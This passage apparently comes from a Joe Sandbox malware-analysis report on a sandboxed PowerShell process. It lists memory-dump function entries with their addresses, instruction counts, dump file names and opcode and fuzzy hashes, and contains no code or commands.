                                                                                                  • Opcode ID: 7edc50f6165fc547f00fad51fc439404fb5075f5f62bbd4e7359ed7d7412df8b
                                                                                                  • Instruction ID: 6933ea8139857db5431cc95f4d1366aafbb92fb52dcbe96cf3070523d6060b0b
                                                                                                  • Opcode Fuzzy Hash: 7edc50f6165fc547f00fad51fc439404fb5075f5f62bbd4e7359ed7d7412df8b
                                                                                                  • Instruction Fuzzy Hash: EA1102303047908FD352DB28D804A49BBB2AF46321F0981EEE146CF2A3CB64AC49C761
                                                                                                  Function 082BCC98 Relevance: .1, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e540cdb2ed421c6eec5fa9a0fe644581db1720248aafd5f184fd1784a270f787
                                                                                                  • Instruction ID: 37019d4ce4d58c2a21d52eacd2fb8498391677c3531b706654ea0dffbe8dfc04
                                                                                                  • Opcode Fuzzy Hash: e540cdb2ed421c6eec5fa9a0fe644581db1720248aafd5f184fd1784a270f787
                                                                                                  • Instruction Fuzzy Hash: 6A11E136A152958FCB25CF68C8049DEBFF2FF89300B1485AED885AB715C730AC45CBA0
                                                                                                  Function 0815185F Relevance: .1, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3c214152e0dd1d4f58219042906a8490a465667525c3dc2f22168a66cf6cfd02
                                                                                                  • Instruction ID: c1d04885fb15442c7926c2816dda2c3fa7ace80c1830eb3b0b4a573b6092fe48
                                                                                                  • Opcode Fuzzy Hash: 3c214152e0dd1d4f58219042906a8490a465667525c3dc2f22168a66cf6cfd02
                                                                                                  • Instruction Fuzzy Hash: B8113035A11114DFCB599B78D8556EDB7F2FFC8312B158069D822AB350CB35E801CFA0
                                                                                                  Function 082BFE98 Relevance: .1, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0f20308cee250af93378e47b53db42c9526bcc7075e119eaec02bf59f8926d85
                                                                                                  • Instruction ID: 50d4c888858cd49eadc02e8d469ce3991482295bcf67c2ea56551173f1676762
                                                                                                  • Opcode Fuzzy Hash: 0f20308cee250af93378e47b53db42c9526bcc7075e119eaec02bf59f8926d85
                                                                                                  • Instruction Fuzzy Hash: 8F11A530B101058FDB04DB69C858BEEBBF6AF88751F144019E902E73D0CEB09C01CBA1
                                                                                                  Function 082832D8 Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1829558126.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8280000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e982af76adaba44827466e6d9fa89d7451589ad875bbd9931a7593c87d9ef770
                                                                                                  • Instruction ID: 9b1d02ecb8e464037cd0208414801c52c365bf90e399e2c2b14c0f83e8b40037
                                                                                                  • Opcode Fuzzy Hash: e982af76adaba44827466e6d9fa89d7451589ad875bbd9931a7593c87d9ef770
                                                                                                  • Instruction Fuzzy Hash: 5211E1712057408FC712EF68D4949857BF8EF0922570545DEE54ACF363CA71EC06CBA1
                                                                                                  Function 08335ED0 Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 19992524f070249220fde76013c3618b1568f8903736d1d90b1085ebe4e3fa68
                                                                                                  • Instruction ID: 625a21502b8c8b5fd2a29d2de1f89c7ccfe19fdeacb60b77de909cce397380b7
                                                                                                  • Opcode Fuzzy Hash: 19992524f070249220fde76013c3618b1568f8903736d1d90b1085ebe4e3fa68
                                                                                                  • Instruction Fuzzy Hash: E60169B4300624DFCB24DB69E858A6B7BFAFBC8312B10852DE50283681DB75E8418B50
                                                                                                  Function 083366D9 Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 730097c2d11a2af6cbda50a7d95b188cff97a504219029216826a5040ac3f677
                                                                                                  • Instruction ID: f5cdf221e9c84a5e81decf2b2ad3c73f108a155969afbe8d89f7a74851d5aee8
                                                                                                  • Opcode Fuzzy Hash: 730097c2d11a2af6cbda50a7d95b188cff97a504219029216826a5040ac3f677
                                                                                                  • Instruction Fuzzy Hash: 62014731300311AFCB109A25D9607BBBFA9DFC5791F94806AE4418F291DEB4DC45C7D1
                                                                                                  Function 08208ADC Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 38426b2b20846e8f96b91f9a86028ca838b74239a11fade04bc7a5c51cdf3a62
                                                                                                  • Instruction ID: ef4d59dbfe4be9938fa4e8c0dc36cf5c7334c1181ff7170d8ee5b9ad51364824
                                                                                                  • Opcode Fuzzy Hash: 38426b2b20846e8f96b91f9a86028ca838b74239a11fade04bc7a5c51cdf3a62
                                                                                                  • Instruction Fuzzy Hash: A311F3B93116119FC728CF29D598C2677B5BF89616311466DE40ACBB62CB30EC42CB90
                                                                                                  Function 083418E1 Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832818931.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8340000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d37ccf5ec6ff5f6f1d2466e18e12a63740243a3ffe64ad8018253ab7b662b969
                                                                                                  • Instruction ID: 8e3ab20a3ec8fe7aff08fffab559164f9d7e3df15d75615bae5ffc8df8aa3f72
                                                                                                  • Opcode Fuzzy Hash: d37ccf5ec6ff5f6f1d2466e18e12a63740243a3ffe64ad8018253ab7b662b969
                                                                                                  • Instruction Fuzzy Hash: B9014930304B418FD321DF29C8446AABBE1FF8A315F04852EC049C7791DBB4A805CB95
                                                                                                  Function 08208739 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ad1a6d7afc68690b0644c92d2446c88ea667bdc363b101b809700b2adbd80c1d
                                                                                                  • Instruction ID: 61d2d0ab4d1d7a4fec71c5a4516ae3d577349a1a0794aa3dea87034a894e633f
                                                                                                  • Opcode Fuzzy Hash: ad1a6d7afc68690b0644c92d2446c88ea667bdc363b101b809700b2adbd80c1d
                                                                                                  • Instruction Fuzzy Hash: AE115E35610115AFCF14DBA8DC68AEE7BF1BF89301F114569E405E72B6DB74A840CF61
                                                                                                  Function 0815F2B7 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ff0e569fba5a182bc23413f90fdf15a3cd99ed78b80a564c0c4d3fdca2f4d111
                                                                                                  • Instruction ID: bf0afe6bc21f8a3298edfab1e2ca6196312d63fdd37c8219d20c971fd9a826ec
                                                                                                  • Opcode Fuzzy Hash: ff0e569fba5a182bc23413f90fdf15a3cd99ed78b80a564c0c4d3fdca2f4d111
                                                                                                  • Instruction Fuzzy Hash: E601D6312007805FC3519B28DC1455E7BA6FFCA360705466EE196CB2E2DBB49D05CBA1
                                                                                                  Function 082B4449 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c36ce61e734df765e5a8821b0a830c5ffb710e6cbec436ce7f84a2d3e585a6ff
                                                                                                  • Instruction ID: 1b4547d25dbba20cc268c589d5ea5c93581c51d1da114f267b94ddcd66f8f8c9
                                                                                                  • Opcode Fuzzy Hash: c36ce61e734df765e5a8821b0a830c5ffb710e6cbec436ce7f84a2d3e585a6ff
                                                                                                  • Instruction Fuzzy Hash: AC21D634A10205DFCB19DFA4D498ADD7BB2FF88325F159168D502AB3A2CB35D881CF51
                                                                                                  Function 081C8140 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828356432.00000000081C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_81c0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5f2ffc2de010612490c0f2894b8c816d51363734caf69ef60db36e2bcf685517
                                                                                                  • Instruction ID: c5e072374466dbfdec0dc91619dffe7109ddd0ce164d2c549777849ade26ce21
                                                                                                  • Opcode Fuzzy Hash: 5f2ffc2de010612490c0f2894b8c816d51363734caf69ef60db36e2bcf685517
                                                                                                  • Instruction Fuzzy Hash: 8401DF317247108FD7359F29C98076737E89F607A2F0540BEDC45CB292EB58EC8187A2
                                                                                                  Function 083340AA Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: efb702dd158ec4fe476aef44b70d6d7d4971ed316dc68a7448b6b127db7f2ca0
                                                                                                  • Instruction ID: 2239d066cf6364dfc86cfe6dd4a44a2a77d5a8cdefef9e25327eff90d72e6b52
                                                                                                  • Opcode Fuzzy Hash: efb702dd158ec4fe476aef44b70d6d7d4971ed316dc68a7448b6b127db7f2ca0
                                                                                                  • Instruction Fuzzy Hash: 7311FEB5904259AFCF41CF99C8409AABFF5FF4D214B244199E948AB202D336E913CFA1
                                                                                                  Function 083365D0 Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f4f21ebe1ee60587d7ee92191a05b73bf91f864cf34f4f9eefa5833b0d4c1a83
                                                                                                  • Instruction ID: 59437ded3431fb96e36202a9903e2b688553b9178ade215aa48d6b126a7bd8ac
                                                                                                  • Opcode Fuzzy Hash: f4f21ebe1ee60587d7ee92191a05b73bf91f864cf34f4f9eefa5833b0d4c1a83
                                                                                                  • Instruction Fuzzy Hash: 0A017172E0925CAF8B42DFBA98004EFBFF9AEC9210B1485B7D158E3211E6754614CBA1
                                                                                                  Function 07FB0B0A Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823717456.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fb0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0b65933bfdb8c75e839b053b23f0256f1bf73cbcfc0b9def990fd267d0e1acc2
                                                                                                  • Instruction ID: 943e5586dcc197ae19d501b92849243521a6ba2ad52ee0e5a325f11ffc0cbd6b
                                                                                                  • Opcode Fuzzy Hash: 0b65933bfdb8c75e839b053b23f0256f1bf73cbcfc0b9def990fd267d0e1acc2
                                                                                                  • Instruction Fuzzy Hash: 930145B0E002546BEB208B689C00BFF7F659F81700F24407AF544AB2C2CBB15916C7A1
                                                                                                  Function 07FB0A7A Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823717456.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fb0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a4ae2b82e975b7dc7a74d334a10d8403476fe21068c2e9780e334cf4018e2de7
                                                                                                  • Instruction ID: 5be1297a74d9c4a844b8f05109e8aafe71b6b7bad65ae99acfa05b943973b5af
                                                                                                  • Opcode Fuzzy Hash: a4ae2b82e975b7dc7a74d334a10d8403476fe21068c2e9780e334cf4018e2de7
                                                                                                  • Instruction Fuzzy Hash: 5301F5B0E052906BE7219769DC04BFFBF669F81700F18407AF504AF6C2CB755915C7A1
                                                                                                  Function 083344A8 Relevance: .0, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3aaa9a11bcde632758cc601e98f6a8c4da0ffc14b5a30aabf95d447dcacfda42
                                                                                                  • Instruction ID: 6203744c970e1bdbaeac3591166430447bbc295133bc8a800b20441cf665cf1c
                                                                                                  • Opcode Fuzzy Hash: 3aaa9a11bcde632758cc601e98f6a8c4da0ffc14b5a30aabf95d447dcacfda42
                                                                                                  • Instruction Fuzzy Hash: E001FC313053406FDB169F64DC11BD93F63EF86750F44409AF6059F2E1CAB25819D7A5
                                                                                                  Function 07FB23D8 Relevance: .0, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823717456.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fb0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c909ea94cb7f27c17bc1e82a26b70da8e4974346de01bc5cabd48c3d4c73e7d6
                                                                                                  • Instruction ID: 4b2888aece622be5cf06a51959833e159087d30ad01b701333a79f898e1a56b6
                                                                                                  • Opcode Fuzzy Hash: c909ea94cb7f27c17bc1e82a26b70da8e4974346de01bc5cabd48c3d4c73e7d6
                                                                                                  • Instruction Fuzzy Hash: 0F115AB1D04269AFDF14CFA9D944AEDBFF6AF89310F188026E814B7251C7709904CBA0
                                                                                                  Function 07FB4920 Relevance: .0, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823717456.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fb0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 77958c7c7a1507ca98b11a5e840e38532c2be1bb7141df54662307b6689e24f4
                                                                                                  • Instruction ID: 875580c8b3676f02d4eeb728ac133e647836ac5aeb00884fa0f13be0802d0cdf
                                                                                                  • Opcode Fuzzy Hash: 77958c7c7a1507ca98b11a5e840e38532c2be1bb7141df54662307b6689e24f4
                                                                                                  • Instruction Fuzzy Hash: 53116571A002499BDB14DF65CE19AFE7BB9FB88354F140454E905E7251CB715E00CFA1
                                                                                                  Function 08349B48 Relevance: .0, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832818931.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8340000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dcd656382b5985cfb60ebe0a3bcb5a6eca68bd08c25cc727a5c5ff1fe371c514
                                                                                                  • Instruction ID: 4dd8352e3c83620ed08cf844d1b4bee45dae1faf00c3b6f55d38290fb947cde6
                                                                                                  • Opcode Fuzzy Hash: dcd656382b5985cfb60ebe0a3bcb5a6eca68bd08c25cc727a5c5ff1fe371c514
                                                                                                  • Instruction Fuzzy Hash: 1D110531A016159F8B54DF69D880AAEBBF6EFC9211B10852DD85AE7710EB31A942CB90
                                                                                                  Function 0828C440 Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1829558126.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8280000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 888b238e56403056039d11295ba02291cf307e26cbc38da8d8eb469b77b1848b
                                                                                                  • Instruction ID: be146ae27472ab1758d73e59aae927fbbaad0702415d6a5b11fef86cf33087af
                                                                                                  • Opcode Fuzzy Hash: 888b238e56403056039d11295ba02291cf307e26cbc38da8d8eb469b77b1848b
                                                                                                  • Instruction Fuzzy Hash: E6018F31700605AFD710EA59E840F5BB7EAEBC8721F10C139E519CB784DB70EC068BA5
                                                                                                  Function 08208AE0 Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: edc608ee0550582fffe0aac189d0eefc3de937c4494aac162a77867867b78011
                                                                                                  • Instruction ID: df4ecb05630c4d66da41f99f65d7cff72ec3f49e8f4bd331532ab4ba719537c0
                                                                                                  • Opcode Fuzzy Hash: edc608ee0550582fffe0aac189d0eefc3de937c4494aac162a77867867b78011
                                                                                                  • Instruction Fuzzy Hash: 1F01C5B53116158FC718CF29D598D1677B5FF89616311466DE40ACBB71CB70EC41CB90
                                                                                                  Function 082BF190 Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9f85c54eba65cf6797cc6d166dc4a863052d57bd32dedb6301351179ed3752fd
                                                                                                  • Instruction ID: c7ff8ef1e9089d4618ff7dda78edc3984e0c0ff4a3c22928026b7ec0c6ca6c5b
                                                                                                  • Opcode Fuzzy Hash: 9f85c54eba65cf6797cc6d166dc4a863052d57bd32dedb6301351179ed3752fd
                                                                                                  • Instruction Fuzzy Hash: 8001A2326127209FD3209669DA40AABBBE9EFC4351F48C56EE8448B741DBB4EC0587A1
                                                                                                  Function 082B6CD0 Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5f7e78b55988c5372ba5b7ac8b2924e2c219087ab4321051427b3a3af1214da1
                                                                                                  • Instruction ID: ae0e1ec88959b23102829886519e2409c0fd189e5f0312d47548514f58255b4e
                                                                                                  • Opcode Fuzzy Hash: 5f7e78b55988c5372ba5b7ac8b2924e2c219087ab4321051427b3a3af1214da1
                                                                                                  • Instruction Fuzzy Hash: A7115775614249CFCF06EF64C8949DEBBB2BF49304F150498D441BF361CA76AD05CBA1
                                                                                                  Function 0080D01D Relevance: .0, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811638753.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_80d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e8c27c2034ebb5657cba6200cbb9806cac66f9a170c4c0d783758647a0d08284
                                                                                                  • Instruction ID: ec1fdba6311cf53bb30020bd1c72d2c78c3661bc26e9b8f5e59dafb8354dade7
                                                                                                  • Opcode Fuzzy Hash: e8c27c2034ebb5657cba6200cbb9806cac66f9a170c4c0d783758647a0d08284
                                                                                                  • Instruction Fuzzy Hash: 5001F231504B049BE7608F62CD80B67BBDCEF41329F28C01AEC4C8B2C2C2799841CAB2
                                                                                                  Function 07FB0B18 Relevance: .0, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823717456.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fb0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7771a35e034f836e760683a534b5bd924f5750ce3e40dcf714dbc0c17759ce20
                                                                                                  • Instruction ID: 551ef085baed79858342222fdf7db0189fde49ad00a4a5089b60fbbd8e941e37
                                                                                                  • Opcode Fuzzy Hash: 7771a35e034f836e760683a534b5bd924f5750ce3e40dcf714dbc0c17759ce20
                                                                                                  • Instruction Fuzzy Hash: 6601D470A002546BDB209B599C01BBF7B659B81B10F14407AF504AB2C1CBB05915C7A1
                                                                                                  Function 082B868F Relevance: .0, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fe4c38eddfad25c107bdbae3440016c9a30acd698acb94e11a30abbca8a63f63
                                                                                                  • Instruction ID: 93c29c4de53fc898c308d62ccddca92bf1c1e6333c5eb5576942c6ab046a518e
                                                                                                  • Opcode Fuzzy Hash: fe4c38eddfad25c107bdbae3440016c9a30acd698acb94e11a30abbca8a63f63
                                                                                                  • Instruction Fuzzy Hash: 150126392192A15FC71187B8C4256F93FE9AF462C2F0800F9D48CCF392DA34D956C7A6
                                                                                                  Function 08208A12 Relevance: .0, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 583da60a6441005cc4feb7cf9624644390ca8362da9ba9a81e0eb173050f71e7
                                                                                                  • Instruction ID: 80cb85e49ba1e3026b7384d07576bb77e2248908e694bedf3d4f7e15e4d574ad
                                                                                                  • Opcode Fuzzy Hash: 583da60a6441005cc4feb7cf9624644390ca8362da9ba9a81e0eb173050f71e7
                                                                                                  • Instruction Fuzzy Hash: FC012D31A14115DFEF149FA8DD28A9E7BF1BF89201F0549ADD842AB6B1CB749840CFA1
                                                                                                  Function 083418F0 Relevance: .0, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832818931.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8340000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0564deaa8c68c4d1597f7a7c1bfe5bd87ab7e885e1fd6dbfbe530855f4419d8a
                                                                                                  • Instruction ID: 2e63f9e90de60371a12f368f1ebb1cf20b66a6bf3122bb419ef05ef6d90d80bd
                                                                                                  • Opcode Fuzzy Hash: 0564deaa8c68c4d1597f7a7c1bfe5bd87ab7e885e1fd6dbfbe530855f4419d8a
                                                                                                  • Instruction Fuzzy Hash: 8001BC30200B059FE764DF1AC84469AF3E5FF88355F00862DD40983790DBB0A805CBA5
                                                                                                  Function 082BCE58 Relevance: .0, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
